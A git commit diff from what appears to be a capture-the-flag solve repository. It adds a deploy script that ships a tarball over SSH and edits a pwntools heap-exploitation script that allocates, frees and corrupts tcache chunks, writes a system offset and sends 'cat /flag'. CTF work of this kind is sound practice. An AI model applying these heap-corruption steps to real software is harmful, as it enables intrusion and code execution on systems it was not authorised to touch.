commit 56ae4f33c8a4b9baf54e309528fc80f68f90350f
parent b662913587367b99eea9eda31e0b40d36d68bf3f
Author: Louis Burda <quent.burda@gmail.com>
Date: Sun, 28 Apr 2024 03:29:51 +0200
Stash
Diffstat:
3 files changed, 24 insertions(+), 18 deletions(-)
diff --git a/solve/.gitignore b/solve/.gitignore
@@ -1 +1,5 @@
.gdb_history
+build
+dist
+send
+*.tar.xz
diff --git a/solve/deploy b/solve/deploy
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+if [ $# -lt 1 ]; then
+ echo "Usage: deploy SSH-CMD"
+ exit 1
+fi
+
+#rm -rf dist build
+#pyinstaller --collect-all pwnlib --collect-all pwntools solve
+#tar -czf solve.tar.xz dist/solve
+
+tar -czf solve.tar.xz send/get-pip.py send/build/
+cat solve.tar.xz | dd status=progress | base64 | $@ "rm -rf dist solve.tar.xz; base64 -d > solve.tar.xz && tar -xf solve.tar.xz"
+
+
+
+#id=1028371871728371098712983719820731
+#scp solve.tar.xz "root@sinitax.com:web/files/private/$id"
+#$@ "wget 'https://files.sinitax.com/private/$id' && tar -xf '$id'"
diff --git a/solve/solve b/solve/solve
@@ -106,12 +106,6 @@ if pwnlib.args.args.GDB:
+ ' -ex "target remote localhost:1025" -ex "b main" -ex "continue" -ex "b exit"'
run_in_new_terminal(["sh", "-c", f'sleep 1; sudo -E {gdb}'], kill_at_exit=False)
-# increase input buf size
-# io.readuntil(b"> ")
-# largebin_size = heap_size(4)
-# io.sendline(b"Z" * heap_adj(largebin_size))
-# io.readuntil(b"> ")
-
b = alloc(cc() * heap_adj(small_size))
c = alloc(cc() * heap_adj(tcache_size))
d = alloc(cc() * heap_adj(tcache_size))
@@ -137,9 +131,6 @@ free(a)
free(c)
flipv(c, 0, 0x800000)
-#flipv(c, 0, 0x000040)
-
-#list(map(free, spacing))
c = alloc(cc() * heap_adj(tcache_size))
@@ -162,12 +153,4 @@ io.sendline(cc() * 0x18 + system_offset)
io.sendline(b"cat /flag") # must be <= 0x11
io.sendline(b"!"*0x81) # cause realloc
-#free(d) # to prevent issue with invalid reveal ptr in move#d chunk
-
-# edit(a, b"X"*0x8+win)
-
-if pwnlib.args.args.GDB:
- embed()
-
-io.sendline(b"")
-io.interactive()
+print(io.readall())
